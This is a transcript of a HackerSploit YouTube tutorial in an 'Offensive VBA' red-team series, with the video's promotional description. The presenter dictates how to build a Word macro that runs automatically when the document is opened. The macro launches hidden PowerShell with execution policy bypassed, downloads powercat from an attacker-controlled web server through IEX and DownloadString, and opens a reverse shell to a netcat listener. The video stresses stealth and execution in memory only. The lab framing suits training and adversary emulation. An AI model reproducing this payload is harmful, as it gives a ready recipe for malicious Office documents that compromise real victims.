# Offensive VBA 0x4 - Reverse Shell Macro with Powercat ## Метаданные - **Канал:** HackerSploit - **YouTube:** https://www.youtube.com/watch?v=0W3Z3Br56XM - **Дата:** 03.02.2025 - **Длительность:** 11:52 - **Просмотры:** 6,569 ## Описание In this episode of the Offensive VBA series, we dive into one of the most powerful techniques for red teamers—creating a reverse shell VBA macro using Powercat. This technique enables stealthy command execution and remote access through malicious macro-enabled Office documents. In this video, you will learn how to build a reverse shell VBA Macro that leverages Powercat allowing you to stealthily execute remote commands in-memory using PowerShell. Powercat: https://github.com/besimorhino/powercat // Adversary Emulation Labs New to CYBER RANGES? Register here: https://bit.ly/40dRMsb CYBER RANGES Adversary Emulation Labs (Free): https://bit.ly/4amBPEU 🎥 Have an idea for a video? make your submission here: https://forms.gle/VDwwMsuudzQfT9VM6 // MORE RESOURCES HACKERSPLOIT BLOG ►► https://bit.ly/3qjvSjK HACKERSPLOIT FORUM ►► https://bit.ly/39r2kcY HACKERSPLOIT ACADEMY ►► https://bit.ly/39CuORr CYBER RANGES (LABS) ►► https://app.cyberranges.com // SOCIAL NETWORKS TWITTER ►► https://bit.ly/3sNKXfq INSTAGRAM ►► https://bit.ly/3sP1Syh LINKEDIN ►► https://bit.ly/360qwlN PATREON ►► https://bit.ly/365iDLK MERCHANDISE ►► https://bit.ly/3c2jDEn // MY BOOKS Privilege Escalation Techniques ►► https://amzn.to/3ylCl33 Docker Security Essentials (FREE) ►► https://bit.ly/3pDcFuA // SUPPORT THE CHANNEL NordVPN Affiliate Link (73% Off) ►► https://bit.ly/3DEPbu5 Get $100 In Free Linode Credit ►► https://bit.ly/3yagvix // CYBERTALK PODCAST Spotify ►► https://spoti.fi/3lP65jv Apple Podcasts ►► https://apple.co/3GsIPQo // WE VALUE YOUR FEEDBACK We hope you enjoyed the video and found value in the content. We value your feedback, If you have any questions or suggestions feel free to post them in the comments section or contact us directly via our social platforms. // THANK YOU! Thanks for watching! Благодарю за просмотр! Kiitos katsomisesta Danke fürs Zuschauen! 感谢您观看 Merci d'avoir regardé Obrigado por assistir دیکھنے کے لیے شکریہ देखने के लिए धन्यवाद Grazie per la visione Gracias por ver شكرا للمشاهدة ----------------------------------------------------------------------------------- #pentesting #cybersecurity #hacker ## Содержание ### [0:00](https://www.youtube.com/watch?v=0W3Z3Br56XM) Segment 1 (00:00 - 05:00) hey guys hack exploit here back again with another video Welcome Back to the offensive VBA series um in this video we're going to be taking a look at um how to develop a reverse shell macro uh but with a small twist so you know I think we've probably covered this already um and then I think this will be the last uh or I should say the um it'll sort of be the video that will help us bridge the gap um you know we took a break in the adverse rul series uh to cover this process you know the process of developing a macro for initial access so after this we'll then resume with emulating fin six and we'll you know pretty much uh move on into the active directory uh pen testing side of things but anyway um as the title of this video suggests we are going to be leveraging a tool uh or a script called powercat so I'm currently on my windows a virtual machine here and I've just rdpd into my Cali Linux system and I'm just going to maximize this and I'll just uh head over into my browser and I'm currently on the powercat GitHub repository right over here apologies if my connection is a little bit slow and uh this is the um the script in question uh by the way all credits go to the uh to the author again link will be in the description section but you may be asking yourself what exactly is power cat well um as it uh suggests right over here um it's uh netcat the Powershell version or it's sort of the equivalent of netcat but again in Powershell and uh in this particular case know it's quite old but you'll see how powerful it is you know uh it pretty much supports paral version two and later um and there's many ways you can go about using this particular script or module if you will um and let me just give you a basic or brief introduction um so as it says right over here powercat is a partial function which means you first need to load the function be uh before you can execute it you can put one of the you know one of the um following commands that are outlined below here into your partial profile so on and so forth but in any case this is what you know you're able to do so just think of it as a um very powerful um netcat implementation um and you know given that it's Powershell the idea is to have something similar to netcat but um again for Windows so with Linux as you know it's fairly simple if you have netcat installed on a Target Linux system you can either you know set up a listener on the target system and that in that case you'll have a bind shell or you'll essentially be connecting to the port that you're listening on the Target or you can tell the target to connect to your listener um and uh in this case you know power cat just like netcat can work in um can serve two purposes you can set up a listener and uh you can also you know connect to a listener so um you know other than that if you want a detailed um review of powercat and how it can be used in different ways just let me know in the comment section I'll make a video on that the best way to show you how this works again is in the form of a macro so what I've done and by the way this G PR only has one script the partial um script right over here so you can just download it I've uh downloaded it to my desktop on the Cali Linux system so you can see I have it here what I'm going to do now is uh I'm just going to set up a uh web server here on Port 880 to host it and then I'm going to set up a netcat list now you can also use power cat if you want on The Listener side uh if you are you know uh receiving a reverse connection but you know in this case I'll say p sudo netcat and VP and in this case I'll use uh creative Port 1337 right um and I'll hit enter okay so we have this going I'm now going to minimize my Cali Linux system and we're going to open up word here I'm going to create a blank document um and I'll go ahead and save this on my desktop as uh we'll just call this uh Power cat of course in reality this is not something you should be doing but for the sake of demonstration we'll create it so doc a macro enable document so docm macros and I'll click on um the micros in this particular document and I'll create one here we'll just call it power cat so very simple and I'll open up the VBA IDE very simple very nice um Okay so we have the ### [5:00](https://www.youtube.com/watch?v=0W3Z3Br56XM&t=300s) Segment 2 (05:00 - 10:00) powercat sub routine here I'm going to create um two predefined sub routines to control what happens when the document is opened um so I already mentioned I've already covered the auto open sub routine here but we also have another one called the document open uh sub routine which essentially does as uh the name suggest it'll execute the macro once you know the user actually clicks on run macro or enable content it'll automatically uh run the macro again when the document is opened um so what we're going to do is we'll create it here so sub and uh document open is its name and in here we're just going to call power cat well not call it we're just going to specify the macro the sub routine we want to run so power cat like so in both of them just as a fail safe uh so now in the power cat sub routine we are going to need to create two variables so the first one I'll create is the uh variable called URL and this is going to be of type string because it's going to store a string and then we'll create one to hold the poell script or command so we can just call it um PS script how about that as string okay so first things first let's specify what we're going to store in the URL variable so in this case it's going to be the um the address of the web server that's hosting powercat which we've already set up in my case it's going to be my Cali Linux system on my local network the IP address of my celly Linux system is 1921 168 224 we set up the web server on port 8080 and then of course power cat. PS1 okay very nice simple and then PS script this is going to hold the Powershell IO invol ex uh invoke execution uh command that'll essentially download the powercat um script and then um after that's done it'll you know execute power cat and tell it to connect to our listener which you know in the case of the C Linux system is a netcat listener um on Port 1337 and then we'll specify the um we will'll specify that we want to execute uh you know we just want a basic a command shell or a command prompt if you will so I'll say I ex and then in here we'll you know create a new um object new object and then uh system. net do web client um and then uh download string and then in here we will specify the URL so URL and we just uh concatenate there so uh yeah and then we say with power cat so if you remember the instructions in U on the GitHub repo powercat and then connect in this case we're not listening we're connecting back to the Cali Linux listener 192 this is where I specify the IP address of the Cali Linux system 24 uh the port where you know that you have the listener running on in this case 1337 and then uh e uh exit Ute CMD right um okay so now we can utilize shell and say you know power shell. exe and then specify all the poell options here so execution policy this is by pass and then we can say you know um window style for example uh hidden and then we can say uh because we want to concatenate here uh we want to then include the totality or whatever PS script is storing which in this case will include um right over here because this is going sequentially it'll include the URL which I've already specified so um PS script and then we say uh we're going to concatenate here and that's 1 2 3 4 then we specify VB hiide uh sorry my bad uh like so all right so that should work without any issues and now I'm going to save my macro which I've just done and I'm not going to debug we'll find out if we've made a mistake I'll just give it a run through one more time and uh there we go okay that looks nice no issues close this up and save the document and now I'll bring up the Cali Linux system so right over here we can ### [10:00](https://www.youtube.com/watch?v=0W3Z3Br56XM&t=600s) Segment 3 (10:00 - 11:00) see that we have the web server so we'll be monitoring this as I open the document um let me resize this CU I want to be able to see this and I'll open up word here really quickly so I can resize the window again so you can see that there okay so I'll Now open up the powercat document here and we'll enable the macro or run it and there we are we can see we get a get request to web server hosting powercat and if we take a look at our listener indeed we get a reverse shell you know essentially uh command prompt ifel or command shell and uh yeah so very basic but uh you know very minimal in terms of resources and of course because we used I ex uh it's being executed in memory there's nothing being saved on the dis so no payloads or anything like this um and yeah so if I say system info let's see this here there we are we can confirm that and uh you know if I say right over here let me maximize this so I say uh admin yeah there we are and then you know we can proceed to privilege escalation and all that good stuff but yeah so that's uh what I wanted to highlight in this video nothing crazy uh link to powercat the GitHub report will be in the description section if you have any questions or comments or if you have um you know any recommendations please leave them in the comment section down below if you enjoyed this video found value in it please leave a like down below and uh I will be seeing you in the next video --- *Источник: https://ekstraktznaniy.ru/video/20357*